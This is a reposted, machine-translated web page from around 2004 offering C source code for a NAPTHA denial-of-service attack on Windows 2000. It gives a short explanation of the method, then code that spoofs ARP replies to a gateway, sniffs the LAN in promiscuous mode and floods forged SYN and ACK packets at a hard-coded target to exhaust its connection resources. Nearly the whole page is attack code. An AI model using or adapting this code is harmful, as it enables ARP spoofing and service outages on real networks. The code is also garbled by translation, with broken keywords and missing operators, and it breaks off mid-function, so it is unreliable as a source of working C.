2. Tech
  3. NAPTHA attack mode Simple implementation under 2K

NAPTHA attack mode Simple implementation under 2K

xiaoxiao2021-03-06  14

NAPTHA attack mode Simple implementation under 2K

/ * Author: LionD8 EMAIL: liond8@eyou.com Source: https:? //Www.xfocus.net/bbs/index.php act = SE & f = 3 & t = 33339 & p = 117598

My nest: http://liond8.126.com 2004.2.16 Simple principle in the early hours of the morning: 1. Deception gateway, let the gateway know the Mac in the phantom host. 2. Sniffing all the packets in the LAN, how is it returned to illusion? The second time of the host's second handshake. If so, forget the 3rd handshake. 3. Send forged SYN packets. DOS is performed by consumed the resource of the other's maintenance connection. Occupy channels, etc. For detailed principles, please refer to WARNING3 Boss' s "New Network DOS (Refusal Service) Attack Vulnerability -" Naptha "" I will not talk nonsense.

Address: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=7211*///////////ww // The following code is compiled by // on the virtual machine, it seems to 2K Such as "NAPTHA" // said, nothing affected by "naptha" //, not affected .///include "stdio.h" #include "packet32.h" #include "Windows.h "#include #include" winsock2.h "#include" wchar.h "#define EPT_IP 0x0800 #define EPT_ARP 0x0806 #define ARP_HARDWARE 0x0001 #define ARP_REQUEST 0x0001 #define ARP_REPLY 0x0002 # define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 // promiscuous #pragma comment (lib, "packet.lib") # Pragma Comment (LIB, "WS2_32.LIB") # Pragma Pack (Push, 1) TypedEf struct ehhdr {uchar eh_dst [6]; uchar eh_src [6]; ushort eh_type } Ehheadr, * pehheadr; typef struct arphdr {usort arp_hrd; ushort arp_pro; uchar arp_hln; uchar arp_pln; uchort arp_op; uchar arp_sha [6]; ul ONG arp_spa; UCHAR arp_tha [6]; ULONG arp_tpa;} ARPHEADR, * PARPHEADR; typedef struct arpPacket {EHHEADR ehhdr; ARPHEADR arphdr;} ARPPACKET, * PARPPACKET; #pragma pack (pop) typedef struct ip_head {unsigned char h_verlen; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP;} IPHEADER; typedef struct tcp_head {USHORT th_sport; USHORT th_dport; unsigned int th_seq ;

unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp;} TCPHEADER; typedef struct tsd_hdr {unsigned long saddr; unsigned long daddr; char mbz; char ptcl; unsigned short tcpl;} PSDHEADER; DWORD WINAPI ThreadArpSnoop (LPVOID lp); USHORT checksum (USHORT * buffer, int size); DWORD WINAPI ThreadSynFlood (LPVOID lp); DWORD WINAPI SnifferSynAck (LPVOID lp); void SendAck (DWORD SEQ, DWORD ACK, USHORT SPort); void AnalyseData ( LPPACKET LPPACKET); # define Atport 80 // Attack Port #define atip "192.168.1.1" // Attack IP # Define Gate "192.168.85.1" // Gateway #define snoopip "192.168.85.250" // Phantom host ip # define Sleeptime 1000 Uchar DMACADDR [6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}; // Broadcast uchar smacaddr [6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xfe}; // Phantom host MacBool ISGOON = true; void main () {isgoon = fal Se; CreateThread (Null, Null, Threadarpsnoop, Null, Null, Null); While (! Isgoon) Sleep (1); isgoon = false; CreateThread (Null, Null, Sniffersynack, Null, Null, Null); While (! Isgoon) ) Sleep (1); CreateThread (Null, Null, Threadsynflood, Null, Null, Null); While (1) Sleep (1000000);} DWord WinApi Threadarpsnoop (LPVOID LP) {Static Char AdapterList [10] [1024]; tchar szPacketBuf [512]; lPADAPTER lpAdapter; LPPACKET lpPacket; WCHAR AdapterName [2048]; WCHAR * temp, * temp1; ARPPACKET ARPPacket; ULONG AdapterLength = 1024; DWORD AdapterNum = 0; DWORD nRetCode, i;

if (PacketGetAdapterNames ((char *) AdapterName, & AdapterLength) == FALSE) {printf ( "Unable to retrieve the list of the adapters / n!"); return 0;} temp = AdapterName; temp1 = AdapterName; i = 0; While (* Temp! = '/ 0') || (* (TEMP-1)! = '/ 0')) {if (* Temp == '/ 0') {Memcpy (AdapterList [i], TEMP1 (Temp-Temp1) * SizeOf (Wchar)); TEMP1 = Temp 1; I ;} Temp ;} adapternum = i; for (i = 0; i adapternum) {printf (" / Ninput Number error ");! return 0;} IsGoOn = TRUE; lpAdapter = (LPADAPTER) PacketOpenAdapter ((LPTSTR) AdapterList [i-1]); if (! lpAdapter || (lpAdapter-> hFile == INVALID_HANDLE_VALUE)) {nRetCode = GetLastError (); Printf ("Unable to open the driver, error code:% lx / n", nretcode); return 0; } LpPacket = PacketAllocatePacket (); if (lpPacket == NULL) {printf ( "/ nError:. Failed to allocate the LPPACKET structure"); return 0;} memset (szPacketBuf, 0, sizeof (szPacketBuf)); memcpy (ARPPacket .ehhdr.eh_dst, DMacAddr, 6); memcpy (ARPPacket.ehhdr.eh_src, SMacAddr, 6); ARPPacket.ehhdr.eh_type = htons (EPT_ARP); ARPPacket.arphdr.arp_hrd = htons (ARP_HARDWARE); ARPPacket.arphdr.arp_pro = HTONS (EPT_IP); arpppacket.arphdr.arp_hln = 6;

ARPPacket.arphdr.arp_pln = 4; ARPPacket.arphdr.arp_op = htons (1); memcpy (ARPPacket.arphdr.arp_sha, SMacAddr, 6); ARPPacket.arphdr.arp_spa = inet_addr (SNOOPIP); memset (ARPPacket.arphdr.arp_tha , 0,6); ARPPacket.arphdr.arp_tpa = inet_addr (GATE); memcpy (szPacketBuf, (char *) & ARPPacket, sizeof (ARPPacket)); PacketInitPacket (lpPacket, szPacketBuf, 60); if (PacketSetNumWrites (lpAdapter, 1) == false) {Printf ("Warning: Unable to send more than one packet in a single write! / N");} While (1) {if (packetsendpacket (lpadapter, lppacket, true) == false) {Printf "Error sending the packets / n!"); return 0;} Sleep (30000);} PacketFreePacket (lpPacket); PacketCloseAdapter (lpAdapter); return 0;} DWORD WINAPI ThreadSynFlood (LPVOID lp) {WSADATA WSAData; SOCKET sock; SOCKADDR_IN Addr_in; ipheader ipheader; tcpheader tcpheader; ps DHEADER PSDHEADER; int SourcePort; char szsendbuf [60] = {0}; BOOL FLAG; int REC, NTIMEOVER; IF (WsaStartup (MakeWord (2, 2), & WSADATA)! = 0) {Printf ("WsaStartup Error! / N "); RETURN 0;} SOCK = NULL; IF ((SOCK = Socket (SOCKET, SOCK_RAW, IPPROTO_IP) == Invalid_socket) {PrintF (" Socket Setup Error! / N "); return 0;} flag = true; IF (setsock, ipproto_ip, ip_hdrincl, (charg) == socket_error) {printf ("setsockopt ip_hdrincl error! / n"); return false;} ntimeover = 1000; ntimeOver = 1000; NTIMEOVER = 1000;

if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *) & nTimeOver, sizeof (nTimeOver)) == SOCKET_ERROR) // set transmission time {printf ( "setsockopt SO_SNDTIMEO error / n!"); return false;} addr_in. sin_family = AF_INET; addr_in.sin_port = htons (ATPORT); addr_in.sin_addr.S_un.S_addr = inet_addr (ATIP); ipHeader.h_verlen = (4 << 4 | sizeof (ipHeader) / sizeof (unsigned long)); ipHeader. tos = 0; ipHeader.total_len = htons (sizeof (ipHeader) sizeof (tcpHeader)); // IP total length ipHeader.ident = 1; ipHeader.frag_and_flags = 0; ipHeader.ttl = 123; ipHeader.proto = IPPROTO_TCP; ipHeader.checksum = 0; ipHeader.destIP = inet_addr (ATIP); tcpHeader.th_dport = htons (ATPORT); tcpHeader.th_ack = 0; tcpHeader.th_lenres = (sizeof (tcpHeader) / 4 << 4 | 0); tcpHeader. TH_FLAG = 2; tcpheader.th_win = htons (512); tcpheader.th_urp = 0; tcpheader.th_seq = htonl (0x12345678); psdheader.daddr = ipheader.destip; P sdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; psdHeader.tcpl = htons (sizeof (tcpHeader)); ipHeader.sourceIP = inet_addr (SNOOPIP); while (TRUE) {SourcePort = GetTickCount ()% 65534; tcpHeader.th_sport = htons (SourcePort); tcpHeader.th_sum = 0; psdHeader.saddr = ipHeader.sourceIP; memcpy (szSendBuf, & psdHeader, sizeof (psdHeader)); memcpy (szSendBuf sizeof (psdHeader), & tcpHeader, sizeof (tcpHeader)); tcpHeader. TH_SUM = Checksum (USHORT *) Szsendbuf, sizeof (psdheader) sizeof (tcpheader)); Memcpy (SzsendBuf, & &)

ipHeader, sizeof (ipHeader)); memcpy (szSendBuf sizeof (ipHeader), & tcpHeader, sizeof (tcpHeader)); rect = sendto (sock, szSendBuf, sizeof (ipHeader) sizeof (tcpHeader), 0, (struct sockaddr *) & addr_in, sizeof (addR_in)); if (Rect == Socket_ERROR) {Printf ("Send Error!:% x / n", wsagetlasterror ()); Return False;} else printf ("Send OK! / N"); Sleep (SLEEPTIME);} // endwhile closesocket (sock); WSACleanup (); return 0;} USHORT checksum (USHORT * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer Size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16) Return (~ cksum);} DWord WinApi Sniffersynack (LPVOID LP) {LPADAPTER LPADAPTER; Static Char AdapterList [10] [1024]; Ulong Adapternum; Wchar AdapterName 2048]; WCHAR * temp, * temp1; ULONG AdapterLength = 1024; ULONG i, adapter_num = 0; if (PacketGetAdapterNames ((char *) AdapterName, & AdapterLength) == FALSE) {printf ( "Unable to retrieve the list of the adapters ! / n "); return 0;} temp = adaptername; temp1 = adaptername; i = 0; while (* temp! = '/ 0') || (* (TEMP-1)! = '/ 0') ) {If (* temp == '/ 0') {MEMCPY (AdapterList [i], temp1, (temp-temp1) * sizeof (wchar)); temp1 = temp 1; i ;

} Temp ;} adapternum = i; for (i = 0; i adapternum) {printf (" / ninput number ire! "); returnon = true; lpadapter = (lpadapter) Packetopenadapter (LPTSTR) AdapterList [i-1]); if (! Lpadapter || (lPadapter-> HFile == Invalid_Handle_Value)) {Printf ("Unable to open the driver, error code:% lx / n", getLastError ()) ; return 0;} // set the NIC to promiscuous mode if (PacketSetHwFilter (lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) {printf ( "Warning: Unable to set the adapter to promiscuous mode / n");} if (PacketSetBuff (lpAdapter, 1024 * 10) == false) {Printf ("PacketSetBuff Error:% D / N", getLastError ()); return -1;} while (1) {tchar buffer [1024 * 10] = {0}; lppacket lppacket ; Lppacket = packetallocatepacket (); packetinitpack et (lpPacket, Buffer, sizeof (Buffer)); PacketReceivePacket (lpAdapter, lpPacket, TRUE); AnalyseData (lpPacket); PacketFreePacket (lpPacket);} return 0;} void AnalyseData (LPPACKET lpPacket) {char * Buf; EHHEADR * lpEthdr ; Bpf_hdr * lpbpfhdr; buf = (char *) lppacket-> buffer; lpbpfhdr = (bpf_hdr *) BUF; lpethdr = (ehheadr *) (buf lpbpfhdr-> bh_hdrlen); if (lpethdr-> eh_type == htons (0x0800 ) && (! Memcmp (LPETHDR-> EH_DST, SMACADDR, 6))) {TCPHEADER * LPTCPHDR; LPTCPHDR = (TCPHEADER *) (BUF LPBPFHDR->

bh_hdrlen sizeof (EHHEADR) sizeof (IPHEADER)); if (lpTcphdr-> th_ack == ntohl (0x12345678 1) && lpTcphdr-> th_flag == 0x12) {SendAck (lpTcphdr-> th_seq, lpTcphdr-> th_ack, lpTcphdr -> th_dport);}}} void SendAck (DWORD SEQ, DWORD ACK, USHORT SPort) {SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; pSDHEADER psdHeader; char szSendBuf [60] = {0}; BOOL flag; int Rect, ntimeover; sock = null; if ((SOCK = Socket, Sock_RAW, IPPROTO_IP) == Invalid_Socket) {Printf ("Socket Setup Error! / N"); return;} flag = true; if (setsockopt (SETSOCKOPT sock, IPPROTO_IP, IP_HDRINCL, (char *) & flag, sizeof (flag)) == SOCKET_ERROR) {printf ( "setsockopt IP_HDRINCL error / n!"); return;} nTimeOver = 1000; if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO , (char *) & ntimeover, sizeof (ntimeover) == SOCKET_ERROR) // Setting the time {Printf ("setsockopt ! SO_SNDTIMEO error / n "); return;} addr_in.sin_family = AF_INET; addr_in.sin_port = htons (ATPORT); addr_in.sin_addr.S_un.S_addr = inet_addr (ATIP); ipHeader.h_verlen = (4 << 4 | sizeof (ipHeader) / sizeof (unsigned long); ipHeader.tos = 0; ipHeader.total_len = htons (ipHeader) sizeof (tcpheader)); // ip total length ipheader.Ident = 1; ipHeader.frag_and_flags = 0 IpHeader.ttl = 123; ipHeader.proto = ipproto_tcp; ipHeader.checksum = 0; ipHeader.Destip = inet_addr (atip); tcpheader.th_dport = htons (atport);

转载请注明原文地址:https://www.9cbs.com/read-50235.html

9cbs

New Post(0)